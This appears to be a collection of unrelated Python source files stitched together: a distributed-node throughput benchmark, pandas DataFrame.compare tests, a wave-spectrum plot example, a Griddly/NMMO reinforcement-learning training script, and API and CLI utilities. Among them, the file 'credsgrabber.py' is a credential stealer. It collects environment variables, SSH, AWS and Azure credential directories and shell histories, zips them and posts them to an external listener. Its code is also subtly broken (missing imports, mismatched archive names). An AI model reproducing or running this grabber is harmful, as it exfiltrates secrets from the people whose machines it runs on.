masterEndpoint = {"HTTPPort": 8080, "TCPPort": 9080, "IP": "localhost"}
usingMasterNode = False
# localhost test
# endpoint1 = {"HTTPPort": 8083, "TCPPort": 9083, "IP": "localhost"}
# endpoint2 = {"HTTPPort": 8081, "TCPPort": 9081, "IP": "localhost"}
# endpoint3 = {"HTTPPort": 8082, "TCPPort": 9082, "IP": "localhost"}
# allEndpoints = [ endpoint1, endpoint2, endpoint3]
# activeEndpoints = [ endpoint1, endpoint2, endpoint3]
# cloud test basic
# endpoint1 = {"HTTPPort": 8080, "TCPPort": 9080, "IP": "192.168.3.11"}
# endpoint2 = {"HTTPPort": 8080, "TCPPort": 9080, "IP": "192.168.3.11"}
# allEndpoints = [ endpoint1, endpoint2]
# google cloud test
endpoint1 = {"HTTPPort": 8080, "TCPPort": 9080, "IP": "192.168.3.11"}
endpoint2 = {"HTTPPort": 8080, "TCPPort": 9080, "IP": "192.168.3.11"}
endpoint3 = {"HTTPPort": 8080, "TCPPort": 9080, "IP": "172.16.31.10"}
endpoint4 = {"HTTPPort": 8080, "TCPPort": 9080, "IP": "172.16.17.32"}
# endpoint5 = {"HTTPPort": 8080, "TCPPort": 9080, "IP": "192.168.127.12"} # America
allEndpoints = [endpoint1, endpoint2, endpoint3, endpoint4]
# Endpoints that are transmitting
activeEndpoints = [
endpoint1,
endpoint2,
endpoint3,
endpoint4
]
# Global config
numberOfNodes = len(allEndpoints)
txSize = 2000 # bytes
txPerCall = 10000
txToSync = txPerCall * 15
totalSize = txToSync * numberOfNodes * txSize
print "Total size on each node after sync: ", totalSize / 1000000, " MB"
transactionSize = {"transactionSize": txSize}
transactionsPerCall = {"transactions": txPerCall}
transactionsToSync = {"transactionsToSync": txToSync}
stopCondition = {
"stopCondition": int(
txToSync /
txPerCall) *
len(activeEndpoints)}
for endpoint in allEndpoints:
HTTPpost(endpoint, 'reset')
# Set up connections to each other (circular topology)
# for i in range(len(allEndpoints)):
# if (i == len(allEndpoints)-1):
# HTTPpost(allEndpoints[i], 'add-endpoint', allEndpoints[0])
# else:
# HTTPpost(allEndpoints[i], 'add-endpoint', allEndpoints[i+1])
# Fully connected topology
for endpoint in allEndpoints:
for otherEndpoint in allEndpoints:
if(endpoint != otherEndpoint):
HTTPpost(endpoint, 'add-endpoint', otherEndpoint)
# Other setup parameters
for endpoint in allEndpoints:
HTTPpost(endpoint, 'transaction-size', transactionSize)
HTTPpost(endpoint, 'transactions-per-call', transactionsPerCall)
HTTPpost(endpoint, 'stop-condition', stopCondition)
for endpoint in activeEndpoints:
HTTPpostAsync(endpoint, 'transactions-to-sync', transactionsToSync)
# Need to make sure everyone is ready before starting
for t in threads:
t.join()
# master has all endpoints, set it up
if (usingMasterNode):
for endpoint in allEndpoints:
HTTPpost(endpoint, 'is-slave', "{}")
HTTPpost(masterEndpoint, 'add-endpoint', endpoint)
epoch_time = int(time.time())
timeWait = 3
threeSecondsTime = {"startTime": epoch_time + timeWait}
# Set up the start time
for endpoint in allEndpoints:
HTTPpostAsync(endpoint, 'start-time', threeSecondsTime)
if (usingMasterNode):
HTTPpostAsync(masterEndpoint, 'start-test-as-master', threeSecondsTime)
time.sleep(3)
# wait until they're probably done
while(True):
time.sleep(7)
hashPages = [HTTPpost(i, 'finished').json()["finished"] == True
for i in allEndpoints]
print "Finished : ", hashPages
if(sum(hashPages) == len(hashPages)):
break
# Get the time each node took to synchronise
pages = []
maxTime = 0
for endpoint in allEndpoints:
pageTemp = HTTPpost(endpoint, 'time-to-complete')
print jsonPrint(pageTemp)
if(pageTemp.json()["timeToComplete"] > maxTime):
maxTime = pageTemp.json()["timeToComplete"]
    pages.append(pageTemp)
if (usingMasterNode):
pageTemp = HTTPpost(masterEndpoint, 'time-to-complete')
print jsonPrint(pageTemp)
if(pageTemp.json()["timeToComplete"] > maxTime):
maxTime = pageTemp.json()["timeToComplete"]
    pages.append(pageTemp)
print "Max time: ", maxTime
TPS = (txToSync * numberOfNodes) / maxTime
print "Transactions per second: ", TPS
print "Transactions per second per node: ", TPS / numberOfNodes
print "Mbits/s", (TPS * txSize * 8) / 1000000
print "Mbits/s per node", (TPS * txSize * 8) / 1000000 / numberOfNodes
exit(1)
# Check that they have synchronised correctly
print "inspecting the hashes (may take a long time)"
hashPages = []
hashes = [ordered(HTTPpost(i, 'transactions-hash').json())
for i in allEndpoints]
# hashes = [1, 1]
comparison = [x == hashes[0] for x in hashes]
if(all(comparison) == False):
print "FAILED TO MATCH: "
print hashes
res = [HTTPpost(i, 'transactions').json() for i in allEndpoints]
for r in res:
for i in r:
print i
print ""
else:
print "Hashes matched!"
print hashes[0]
|
StarcoderdataPython
|
3226493
|
import numpy as np
import pytest
import pandas as pd
import pandas._testing as tm
@pytest.mark.parametrize("align_axis", [0, 1, "index", "columns"])
def test_compare_axis(align_axis):
# GH#30429
df = pd.DataFrame(
{"col1": ["a", "b", "c"], "col2": [1.0, 2.0, np.nan], "col3": [1.0, 2.0, 3.0]},
columns=["col1", "col2", "col3"],
)
df2 = df.copy()
df2.loc[0, "col1"] = "c"
df2.loc[2, "col3"] = 4.0
result = df.compare(df2, align_axis=align_axis)
if align_axis in (1, "columns"):
indices = pd.Index([0, 2])
columns = pd.MultiIndex.from_product([["col1", "col3"], ["self", "other"]])
expected = pd.DataFrame(
[["a", "c", np.nan, np.nan], [np.nan, np.nan, 3.0, 4.0]],
index=indices,
columns=columns,
)
else:
indices = pd.MultiIndex.from_product([[0, 2], ["self", "other"]])
columns = pd.Index(["col1", "col3"])
expected = pd.DataFrame(
[["a", np.nan], ["c", np.nan], [np.nan, 3.0], [np.nan, 4.0]],
index=indices,
columns=columns,
)
tm.assert_frame_equal(result, expected)
@pytest.mark.parametrize(
"keep_shape, keep_equal",
[
(True, False),
(False, True),
(True, True),
# False, False case is already covered in test_compare_axis
],
)
def test_compare_various_formats(keep_shape, keep_equal):
df = pd.DataFrame(
{"col1": ["a", "b", "c"], "col2": [1.0, 2.0, np.nan], "col3": [1.0, 2.0, 3.0]},
columns=["col1", "col2", "col3"],
)
df2 = df.copy()
df2.loc[0, "col1"] = "c"
df2.loc[2, "col3"] = 4.0
result = df.compare(df2, keep_shape=keep_shape, keep_equal=keep_equal)
if keep_shape:
indices = pd.Index([0, 1, 2])
columns = pd.MultiIndex.from_product(
[["col1", "col2", "col3"], ["self", "other"]]
)
if keep_equal:
expected = pd.DataFrame(
[
["a", "c", 1.0, 1.0, 1.0, 1.0],
["b", "b", 2.0, 2.0, 2.0, 2.0],
["c", "c", np.nan, np.nan, 3.0, 4.0],
],
index=indices,
columns=columns,
)
else:
expected = pd.DataFrame(
[
["a", "c", np.nan, np.nan, np.nan, np.nan],
[np.nan, np.nan, np.nan, np.nan, np.nan, np.nan],
[np.nan, np.nan, np.nan, np.nan, 3.0, 4.0],
],
index=indices,
columns=columns,
)
else:
indices = pd.Index([0, 2])
columns = pd.MultiIndex.from_product([["col1", "col3"], ["self", "other"]])
expected = pd.DataFrame(
[["a", "c", 1.0, 1.0], ["c", "c", 3.0, 4.0]], index=indices, columns=columns
)
tm.assert_frame_equal(result, expected)
def test_compare_with_equal_nulls():
# We want to make sure two NaNs are considered the same
# and dropped where applicable
df = pd.DataFrame(
{"col1": ["a", "b", "c"], "col2": [1.0, 2.0, np.nan], "col3": [1.0, 2.0, 3.0]},
columns=["col1", "col2", "col3"],
)
df2 = df.copy()
df2.loc[0, "col1"] = "c"
result = df.compare(df2)
indices = pd.Index([0])
columns = pd.MultiIndex.from_product([["col1"], ["self", "other"]])
expected = pd.DataFrame([["a", "c"]], index=indices, columns=columns)
tm.assert_frame_equal(result, expected)
def test_compare_with_non_equal_nulls():
# We want to make sure the relevant NaNs do not get dropped
# even if the entire row or column are NaNs
df = pd.DataFrame(
{"col1": ["a", "b", "c"], "col2": [1.0, 2.0, np.nan], "col3": [1.0, 2.0, 3.0]},
columns=["col1", "col2", "col3"],
)
df2 = df.copy()
df2.loc[0, "col1"] = "c"
df2.loc[2, "col3"] = np.nan
result = df.compare(df2)
indices = pd.Index([0, 2])
columns = pd.MultiIndex.from_product([["col1", "col3"], ["self", "other"]])
expected = pd.DataFrame(
[["a", "c", np.nan, np.nan], [np.nan, np.nan, 3.0, np.nan]],
index=indices,
columns=columns,
)
tm.assert_frame_equal(result, expected)
@pytest.mark.parametrize("align_axis", [0, 1])
def test_compare_multi_index(align_axis):
df = pd.DataFrame(
{"col1": ["a", "b", "c"], "col2": [1.0, 2.0, np.nan], "col3": [1.0, 2.0, 3.0]}
)
df.columns = pd.MultiIndex.from_arrays([["a", "a", "b"], ["col1", "col2", "col3"]])
df.index = pd.MultiIndex.from_arrays([["x", "x", "y"], [0, 1, 2]])
df2 = df.copy()
df2.iloc[0, 0] = "c"
df2.iloc[2, 2] = 4.0
result = df.compare(df2, align_axis=align_axis)
if align_axis == 0:
indices = pd.MultiIndex.from_arrays(
[["x", "x", "y", "y"], [0, 0, 2, 2], ["self", "other", "self", "other"]]
)
columns = pd.MultiIndex.from_arrays([["a", "b"], ["col1", "col3"]])
data = [["a", np.nan], ["c", np.nan], [np.nan, 3.0], [np.nan, 4.0]]
else:
indices = pd.MultiIndex.from_arrays([["x", "y"], [0, 2]])
columns = pd.MultiIndex.from_arrays(
[
["a", "a", "b", "b"],
["col1", "col1", "col3", "col3"],
["self", "other", "self", "other"],
]
)
data = [["a", "c", np.nan, np.nan], [np.nan, np.nan, 3.0, 4.0]]
expected = pd.DataFrame(data=data, index=indices, columns=columns)
tm.assert_frame_equal(result, expected)
def test_compare_unaligned_objects():
# test DataFrames with different indices
msg = "Can only compare identically-labeled DataFrame objects"
with pytest.raises(ValueError, match=msg):
df1 = pd.DataFrame([1, 2, 3], index=["a", "b", "c"])
df2 = pd.DataFrame([1, 2, 3], index=["a", "b", "d"])
df1.compare(df2)
# test DataFrames with different shapes
msg = "Can only compare identically-labeled DataFrame objects"
with pytest.raises(ValueError, match=msg):
df1 = pd.DataFrame(np.ones((3, 3)))
df2 = pd.DataFrame(np.zeros((2, 1)))
df1.compare(df2)
|
StarcoderdataPython
|
3389642
|
<filename>docs/gallery/plot_spectra_pcolormesh.py
"""
Spectrum as pcolormesh
======================
Pcolor type plot of wave spectrum
"""
import matplotlib.pyplot as plt
import cmocean
from wavespectra import read_era5
dset = read_era5("../_static/era5file.nc")
ds = dset.isel(lat=0, lon=0, time=0)
p = ds.spec.plot(kind="pcolormesh", cmap=cmocean.cm.thermal)
|
StarcoderdataPython
|
3393571
|
<filename>credsgrabber.py
import requests, os, zipfile
from zipfile import ZipFile
# interesting directories
"""
~/.ssh
~/.aws/
~/.azure/
~/Library/Application Support/Firefox/Profiles/<profilename>.default or
Also other interesting files - osx/linux will have shell stuff like .bash* files, devs may have vim stuff or database shell histories.
if in a shell environment it's good to grab the ENV vars
TODO:
- expand list as a dict or a pickle for a larger set of scrape files
"""
# grab environment variables
envs = os.environ
with open('envs_file.txt','w') as f:
f.write(str(envs))
paths = ['envs_file.txt','~/.ssh','~/.azure','~/.aws','~/.bashrc','~/.bash_profile','~/.bash_aliases','~/.bash_profile','~/.vimrc','~/.viminfo','~/.dbshell']
# create the zip
zipObj = ZipFile('test.zip', 'w')
# Populate the zip
for path in paths:
p = os.path.expanduser(path)
[zipObj.write(mypath, f) for f in listdir(p) if isfile(join(p, f))]
# Close the zip
zipObj.close()
# post the file
url = 'http://mylistener:8888'
files={"archive": ("test.zip", open('sample.zip','rb'))}
values = {'bootytype': 'ssh credentials'}
r = requests.post(url, files=files, data=values)
#
|
StarcoderdataPython
|
3208642
|
"""Defines the factory object for all the initializers"""
from torch.nn.init import kaiming_uniform_, kaiming_normal_, ones_, zeros_, \
normal_, constant_, xavier_uniform_, xavier_normal_
from coreml.factory import Factory
init_factory = Factory()
init_factory.register_builder('kaiming_uniform', kaiming_uniform_)
init_factory.register_builder('kaiming_normal', kaiming_normal_)
init_factory.register_builder('ones', ones_)
init_factory.register_builder('zeros', zeros_)
init_factory.register_builder('normal', normal_)
init_factory.register_builder('constant', constant_)
init_factory.register_builder('xavier_uniform', xavier_uniform_)
init_factory.register_builder('xavier_normal', xavier_normal_)
|
StarcoderdataPython
|
1685632
|
# -*- coding: utf-8 -*-
"""
(C) Rgc <<EMAIL>>
All rights reserved
create time '2020/7/22 14:31'
Usage:
"""
__author__ = 'Rgc'
__title__ = 'distributed_redis_sdk'
__description__ = 'Distributed Redis client SDK for Python Flask, implemented with consistent hashing'
__url__ = '<EMAIL>:Rgcsh/distributed_redis_sdk.git'
__version__ = '0.0.1'
__author_email__ = '<EMAIL>'
__copyright__ = 'Copyright 2020 Attractor'
|
StarcoderdataPython
|
3202475
|
<gh_stars>1-10
# -*- coding: utf-8 -*-
from multiprocessing import Process
from .message_handler import MessageHandler
class ProcessHandler:
process_list: list
output_list: list
has_web: bool = False
message_handler: MessageHandler
use_broker_process: bool = False
broker_process: Process = None
web_process: Process = None
def __init__(self, process_list, output_list, has_web, message_handler, use_broker_process):
self.process_list = process_list
self.output_list = output_list
self.has_web = has_web
self.message_handler = message_handler
self.use_broker_process = use_broker_process
def shutdown(self):
print("in shutdown...")
if self.use_broker_process and self.broker_process.is_alive():
self.broker_process.terminate()
# self.broker_process.kill()
self.broker_process.close()
print("shutdown broker")
if self.has_web and self.web_process.is_alive():
self.web_process.terminate()
# self.web_process.kill()
self.web_process.close()
print("shutdown web")
def run_broker(self, target, args, daemon=False):
self.use_broker_process = True
self.broker_process = Process(target=target, args=args, daemon=daemon)
self.broker_process.start()
def run_web(self, target, args, daemon=False):
self.has_web = True
self.web_process = Process(target=target, args=args, daemon=daemon)
self.web_process.start()
|
StarcoderdataPython
|
92246
|
<reponame>TangoMan75/pyhelper<gh_stars>0
#!/bin/python3
# -*- coding: utf-8 -*-
"""
This file is part of the TangoMan Type Validator package.
(c) "<NAME>" <<EMAIL>>
This source file is subject to the MIT license that is bundled
with this source code in the file LICENSE.
"""
from setuptools import setup
setup(
name='tangoman-pyhelper',
url='https://github.com/tangoMan75/pyhelper',
author='<NAME>',
author_email='<EMAIL>',
packages=['pyhelper'],
version='0.1.0',
license='MIT',
description='A collection of useful scripts',
long_description=open('README.md').read(),
)
|
StarcoderdataPython
|
1744215
|
<filename>ForgeEvo_griddly.py
import copy
from ray.rllib.models import ModelCatalog
from evolution.evolver import init_evolver
from griddly.util.rllib.torch import GAPAgent
import os
import pickle
import sys
# My favorite debugging macro
from pdb import set_trace as T
import gym
import numpy as np
import ray
import ray.rllib.agents.ppo as ppo
from gym.utils.play import play
import torch
import griddly_nmmo
from fire import Fire
from ray import rllib, tune
from ray.rllib.env import MultiAgentEnv
import evolution
import griddly
import projekt
#import python_griddly
from evolution.evo_map import EvolverNMMO
from forge.ethyr.torch import utils
from griddly import GymWrapperFactory, gd
from griddly_nmmo.map_gen import MapGen
from griddly_nmmo.wrappers import NMMOWrapper
from projekt import rllib_wrapper
sep = os.pathsep
os.environ['PYTHONPATH'] = sep.join(sys.path)
from griddly_nmmo.env import NMMO
import matplotlib
matplotlib.use('Agg')
def unregister():
for env in copy.deepcopy(gym.envs.registry.env_specs):
if 'GDY' in env:
print("Remove {} from registry".format(env))
del gym.envs.registry.env_specs[env]
unregister()
'''Main file for the neural-mmo/projekt demo
/projeckt will give you a basic sense of the training
loop, infrastructure, and IO modules for handling input
and output spaces. From there, you can either use the
prebuilt IO networks in PyTorch to start training your
own models immediately or hack on the environment'''
# Instantiate a new environment
def process_obs(obs):
obs = dict([(i, val.reshape(*val.shape)) for (i, val) in enumerate(obs)])
return obs
def createEnv(config):
# test_path = os.path.join(os.path.dirname(os.path.realpath(__file__)), 'griddly_nmmo/nmmo.yaml')
test_path = config['config'].NMMO_YAML_PATH
import python_griddly
print("test path is: ", test_path)
# map_arr = config['map_arr']
# return projekt.RLLibEnv(#map_arr,
# config)
# if not config.REGISTERED:
# unregister()
# wrapper = GymWrapperFactory()
# yaml_path = 'nmmo.yaml'
# wrapper.build_gym_from_yaml(
# 'nmmo',
# test_path,
# level=None,
# player_observer_type=gd.ObserverType.VECTOR,
# global_observer_type=gd.ObserverType.ISOMETRIC,
# )
env_name = 'nmmo.yaml'
config.update({
'env': "custom",
'num_gpus': 1,
'env_config': {
# in the griddly environment we set a variable to let the training environment
# know if that player is no longer active
# 'player_done_variable': 'player_done',
# 'record_video_config': {
# 'frequency': 10000 # number of rollouts
# },
'yaml_file': test_path,
'global_observer_type': gd.ObserverType.ISOMETRIC,
'level': None,
'max_steps': config['config'].MAX_STEPS,
},
})
# return RLlibMultiAgentWrapper(env_config)
env = NMMO(config)
return env
# Map agentID to policyID -- requires config global
def mapPolicy(agentID):
# return 'default_policy'
return 'policy_{}'.format(agentID % config.NPOLICIES)
# Generate RLlib policies
def createPolicies(config):
obs = env.observationSpace(config)
atns = env.actionSpace(config)
policies = {}
for i in range(config.NPOLICIES):
params = {"agent_id": i, "obs_space_dict": obs, "act_space_dict": atns}
key = mapPolicy(i)
policies[key] = (None, obs, atns, params)
return policies
# @ray.remote
# class Counter:
# ''' When using rllib trainer to train and simulate on evolved maps, this global object will be
# responsible for providing unique indexes to parallel environments.'''
# def __init__(self, config):
# self.count = 0
# def get(self):
#     self.count += 1
#
# if self.count == config.N_EVO_MAPS:
# self.count = 0
#
# return self.count
# def set(self, i):
# self.count = i - 1
@ray.remote
class Counter:
''' When using rllib trainer to train and simulate on evolved maps, this global object will be
responsible for providing unique indexes to parallel environments.'''
def __init__(self, config):
self.count = 0
self.idxs = None
def get(self):
if not self.idxs:
# Then we are doing inference and have set the idx directly
return self.count
idx = self.idxs[self.count % len(self.idxs)]
self.count += 1
return idx
def set(self, i):
# For inference
self.count = i
def set_idxs(self, idxs):
self.count = 0
self.idxs = idxs
@ray.remote
class Stats:
def __init__(self, config):
self.stats = {}
self.mults = {}
self.spawn_points = {}
self.config = config
def add(self, stats, mapIdx):
if config.RENDER:
# print(self.headers)
# print(stats)
#calc_differential_entropy(stats)
return
if mapIdx not in self.stats:
self.stats[mapIdx] = {}
self.stats[mapIdx]['skills'] = [stats['skills']]
self.stats[mapIdx]['lifespans'] = [stats['lifespans']]
self.stats[mapIdx]['scores'] = [stats['scores']]
self.stats[mapIdx]['y_deltas'] = [stats['y_deltas']]
else:
self.stats[mapIdx]['skills'].append(stats['skills'])
self.stats[mapIdx]['lifespans'].append(stats['lifespans'])
self.stats[mapIdx]['scores'].append(stats['scores'])
self.stats[mapIdx]['y_deltas'].append(stats['y_deltas'])
def get(self):
return self.stats
def reset(self):
self.stats = {}
def add_mults(self, g_hash, mults):
self.mults[g_hash] = mults
def get_mults(self, g_hash):
if g_hash not in self.mults:
return None
return self.mults[g_hash]
def add_spawn_points(self, g_hash, spawn_points):
self.spawn_points[g_hash] = spawn_points
def get_spawn_points(self, g_hash):
return self.spawn_points[g_hash]
if __name__ == '__main__':
unregister()
# Setup ray
# torch.set_num_threads(1)
torch.set_num_threads(torch.get_num_threads())
ray.init()
global config
config = projekt.config.Griddly()
# Built config with CLI overrides
if len(sys.argv) > 1:
sys.argv.insert(1, 'override')
Fire(config)
config.NMMO_YAML_PATH = os.path.join(os.path.dirname(os.path.realpath(__file__)), 'griddly_nmmo/nmmo.yaml')
# on the driver
counter = Counter.options(name="global_counter").remote(config)
stats = Stats.options(name="global_stats").remote(config)
# RLlib registry
# rllib.models.ModelCatalog.register_custom_model('test_model',
# rllib_wrapper.Policy)
from griddly.util.rllib.torch import GAPAgent
rllib.models.ModelCatalog.register_custom_model('test_model', GAPAgent)
ray.tune.registry.register_env("custom", createEnv)
# save_path = 'evo_experiment/skill_entropy_life'
# save_path = 'evo_experiment/scratch'
# save_path = 'evo_experiment/skill_ent_0'
save_path = os.path.join('evo_experiment', '{}'.format(config.EVO_DIR))
if not os.path.isdir(save_path):
os.mkdir(save_path)
wrapper = GymWrapperFactory()
yaml_path = 'griddly_nmmo/nmmo.yaml'
map_gen = MapGen(config)
init_tiles, probs, skill_names = map_gen.get_init_tiles(yaml_path, write_game_file=True)
try:
evolver_path = os.path.join(save_path, 'evolver.pkl')
with open(evolver_path, 'rb') as save_file:
evolver = pickle.load(save_file)
print('loading evolver from save file')
# change params on reload here
# evolver.config.ROOT = config.ROOT
evolver.config.TERRAIN_RENDER = config.TERRAIN_RENDER
evolver.config.TRAIN_RENDER = config.TRAIN_RENDER
evolver.config.INFER_IDXS = config.INFER_IDXS
evolver.config.RENDER = config.RENDER
evolver.config.ARCHIVE_UPDATE_WINDOW = config.ARCHIVE_UPDATE_WINDOW
# evolver.config.SKILLS = config.SKILLS
# evolver.config.MODEL = config.MODEL
# evolver.config['config'].MAX_STEPS = 200
# evolver.n_epochs = 15000
evolver.reloading = True
evolver.epoch_reloaded = evolver.n_epoch
evolver.restore()
evolver.trainer.reset()
evolver.load()
except FileNotFoundError as e:
print(e)
print(
'Cannot load; missing evolver and/or model checkpoint. Evolving from scratch.'
)
# evolver = EvolverNMMO(
# save_path,
# createEnv,
# None, # init the trainer in evolution script
# config,
# n_proc=config.N_PROC,
# n_pop=config.N_EVO_MAPS,
# )
evolver = init_evolver(
save_path=save_path,
make_env=createEnv,
trainer=None, # init the trainer in evolution script
config=config,
n_proc=config.N_PROC,
n_pop=config.N_EVO_MAPS,
map_policy=mapPolicy,
)
# print(torch.__version__)
# print(torch.cuda.current_device())
# print(torch.cuda.device(0))
# print(torch.cuda.device_count())
# print(torch.cuda.get_device_name(0))
# print(torch.cuda.is_available())
# print(torch.cuda.current_device())
unregister()
wrapper.build_gym_from_yaml(
'nmmo',
yaml_path,
# image_path='~/Griddly/resources/images',
level=0,
player_observer_type=gd.ObserverType.VECTOR,
global_observer_type=gd.ObserverType.ISOMETRIC,
# global_observer_type=gd.ObserverType.ISOMETRIC,
)
ray.tune.registry.register_env('nmmo', NMMO)
rllib_config = {
"env": "custom",
"framework": "torch",
"num_workers": 6,
"num_gpus": 1,
"num_envs_per_worker": 1,
"train_batch_size": 4000,
"sgd_minibatch_size": 128,
'rollout_fragment_length': 100,
"model": {
"conv_filters": [[32, (7, 7), 3]],
},
# "no_done_at_end": True,
"env_config": {
"config": config,
},
}
if config.TEST:
def train_ppo(config, reporter):
agent = ray.rllib.agents.ppo.PPOTrainer(config)
# agent.restore("/home/sme/ray_results/PPO_custom_2021-03-07_23-31-41cnv2ax4i/checkpoint_32/checkpoint-32") # continue training
# training curriculum, start with phase 0
# phase = 0
# agent.workers.foreach_worker(
# lambda ev: ev.foreach_env(
# lambda env: env.set_phase(phase)))
episodes = 0
i = 0
while True:
result = agent.train()
if reporter is None:
continue
else:
reporter(**result)
if i % 10 == 0: # save every 10th training iteration
checkpoint_path = agent.save()
print(checkpoint_path)
i += 1
# you can also change the curriculum here
result = ray.tune.run(train_ppo, config = rllib_config,
# resources_per_trial={
# "cpu": 6,
# "gpu": 1,
# # "extra_cpu": 0,
# },
)
# result = ray.tune.run(ray.rllib.agents.ppo.PPOTrainer, config = rllib_config)
# env = NMMO(rllib_config)
## play(env)
# for i in range(20):
# env.reset()
# for j in range(1000):
# obs, rew, done, infos = env.step(dict([(i, val) for (i, val) in env.action_space.sample().items()]))
## env.render()
# if done['__all__']:
# break
else:
# trainer = ppo.PPOTrainer(config=rllib_config, env=NMMO)
# while True:
# res = trainer.train()
# print(res)
#results = tune.run("PG", config=config, verbose=1)
if config.RENDER:
evolver.infer()
else:
unregister()
evolver.evolve()
|
StarcoderdataPython
|
14791
|
"""common parser argument
"""
# pylint: disable=missing-docstring
# pylint: disable=too-few-public-methods
import argparse
from enum import Enum
import logging
from sys import exit as sys_exit
from . import archivist
from .logger import set_logger
from .proof_mechanism import ProofMechanism
LOGGER = logging.getLogger(__name__)
# from https://stackoverflow.com/questions/43968006/support-for-enum-arguments-in-argparse
class EnumAction(argparse.Action):
"""
Argparse action for handling Enums
"""
def __init__(self, **kwargs):
# Pop off the type value
enum_type = kwargs.pop("type", None)
# Ensure an Enum subclass is provided
if enum_type is None:
raise ValueError("type must be assigned an Enum when using EnumAction")
if not issubclass(enum_type, Enum):
raise TypeError("type must be an Enum when using EnumAction")
# Generate choices from the Enum
kwargs.setdefault("choices", tuple(e.name for e in enum_type))
super().__init__(**kwargs)
self._enum = enum_type
def __call__(self, parser, namespace, values, option_string=None):
# Convert value back into an Enum
value = self._enum[values]
setattr(namespace, self.dest, value)
def common_parser(description):
"""Construct parser with security option for token/auth authentication"""
parser = argparse.ArgumentParser(
description=description,
)
parser.add_argument(
"-v",
"--verbose",
dest="verbose",
action="store_true",
default=False,
help="print verbose debugging",
)
parser.add_argument(
"-u",
"--url",
type=str,
dest="url",
action="store",
default="https://rkvst.poc.jitsuin.io",
help="location of Archivist service",
)
parser.add_argument(
"-p",
"--proof-mechanism",
type=ProofMechanism,
action=EnumAction,
dest="proof_mechanism",
default=ProofMechanism.SIMPLE_HASH,
help="mechanism for proving the evidence for events on the Asset",
)
security = parser.add_mutually_exclusive_group(required=True)
security.add_argument(
"-t",
"--auth-token",
type=str,
dest="auth_token_file",
action="store",
default=".auth_token",
        required=True,
help="FILE containing API authentication token",
)
return parser, security
def endpoint(args):
if args.verbose:
set_logger("DEBUG")
else:
set_logger("INFO")
arch = None
LOGGER.info("Initialising connection to Jitsuin Archivist...")
fixtures = {
"assets": {
"proof_mechanism": args.proof_mechanism.name,
},
}
if args.auth_token_file:
with open(args.auth_token_file, mode="r", encoding="utf-8") as tokenfile:
authtoken = tokenfile.read().strip()
arch = archivist.Archivist(args.url, authtoken, verify=False, fixtures=fixtures)
if arch is None:
LOGGER.error("Critical error. Aborting.")
sys_exit(1)
return arch
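# Usage sketch (illustrative; the description string is an example). A script
# builds the parser, parses its arguments and obtains an authenticated
# Archivist client via endpoint():
#
# def main():
#     parser, _ = common_parser("List assets held in the Archivist")
#     args = parser.parse_args()
#     arch = endpoint(args)    # archivist.Archivist instance, ready for API calls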
|
StarcoderdataPython
|
173732
|
<filename>tests/api/test_generated_endpoints.py
import pytest
import json
import re
from share.disambiguation.matcher import Matcher
from share.disambiguation.strategies import DatabaseStrategy
from share.regulate import Regulator
from share.util import IDObfuscator
from tests import factories
from tests.share.normalize.factories import *
def camelCase_to_underscore(name):
s1 = re.sub('(.)([A-Z][a-z]+)', r'\1_\2', name)
return re.sub('([a-z0-9])([A-Z])', r'\1_\2', s1).lower()
initial = [
Preprint(
id=1,
is_deleted=False,
identifiers=[WorkIdentifier(1, id=1)],
agent_relations=[
Contributor(agent=Organization(id=1, name='American Heart Association')),
Creator(agent=Organization(2, id=2)),
Creator(agent=Organization(id=3)),
]
),
CreativeWork(
id=2,
identifiers=[WorkIdentifier(2, id=2)],
agent_relations=[
Creator(agent=Person(1, identifiers=[AgentIdentifier(14)])),
Funder(agent=Institution(id=5, name='NIH')),
Publisher(agent=Institution(id=6)),
],
related_works=[
Publication(
11,
id=11,
agent_relations=[
Contributor(id=12, agent=Institution(id=7, name="Test University"))
],
identifiers=[WorkIdentifier(3, id=3)]
)
]
)
]
@pytest.mark.django_db
class TestGeneratedEndpoints:
@pytest.mark.parametrize('generator, model, route, controlled_values', [
([Institution(id=5, name='NIH')], 'institution', 'institutions', ['name']),
([Organization(2, id=2)], 'organization', 'organizations', ['name']),
([CreativeWork(
id=2,
identifiers=[WorkIdentifier(2, id=2)],
agent_relations=[Funder(agent=Institution(id=5, name='NIH'))]
)], 'funder', 'funders', ['citedAs']),
([CreativeWork(
id=2,
identifiers=[WorkIdentifier(2, id=2)],
related_works=[
Publication(11, id=11, identifiers=[WorkIdentifier(3, id=3)])
]
)], 'publication', 'publications', ['title', 'description']),
([CreativeWork(
id=2,
identifiers=[WorkIdentifier(2, id=2)],
agent_relations=[Creator(agent=Person(1, identifiers=[AgentIdentifier(14)]))]
)], 'person', 'people', ['name']),
])
def test_get_data(self, generator, model, route, controlled_values, client, Graph, ingest):
ingest(Graph(initial))
graph = Graph(*generator)
Regulator().regulate(graph)
matches = Matcher(DatabaseStrategy()).find_all_matches(graph)
for node in graph:
if node.type == model:
expected = node
expected_id = IDObfuscator.encode(matches[node])
break
response = client.get('/api/v2/{}/{}/'.format(route, expected_id))
actual = json.loads(response.content.decode(encoding='UTF-8'))
assert response.status_code == 200
assert actual['data']['id'] == expected_id
assert actual['data']['attributes']['type'] == expected.type
for value in controlled_values:
assert actual['data']['attributes'][value] == expected[camelCase_to_underscore(value)]
def test_can_delete_work(self, client, normalized_data_id):
preprint = factories.AbstractCreativeWorkFactory(is_deleted=False)
preprint.administrative_change(type='share.dataset')
assert preprint.is_deleted is False
encoded_id = IDObfuscator.encode(preprint)
response = client.get('/api/v2/datasets/{}/'.format(encoded_id))
assert response.status_code == 200
preprint.administrative_change(is_deleted=True)
assert preprint.is_deleted is True
response = client.get('/api/v2/datasets/{}/'.format(encoded_id))
assert response.status_code == 403
assert response.json() == {"errors": [{"source": {"pointer": "/data"}, "detail": "This data set has been removed.", "status": "403"}]}
response = client.get('/api/v2/datasets/')
assert response.status_code == 200
assert response.json() == {'data': [], 'links': {'next': None, 'prev': None}}
@pytest.mark.django_db
@pytest.mark.parametrize('endpoint, factory', [
('agents', factories.AbstractAgentFactory),
('creativeworks', factories.AbstractCreativeWorkFactory),
('normalizeddata', factories.NormalizedDataFactory),
('rawdata', factories.RawDatumFactory),
])
class TestPagination:
def test_no_prev(self, client, endpoint, factory):
resp = client.get('/api/v2/{}/'.format(endpoint))
assert resp.status_code == 200
assert resp.json()['data'] == []
assert resp.json()['links']['prev'] is None
assert resp.json()['links']['next'] is None
def test_one(self, client, endpoint, factory):
factory()
resp = client.get('/api/v2/{}/'.format(endpoint))
assert resp.status_code == 200
assert len(resp.json()['data']) == 1
assert resp.json()['links']['prev'] is None
assert resp.json()['links']['next'] is None
def test_full_page(self, client, endpoint, factory):
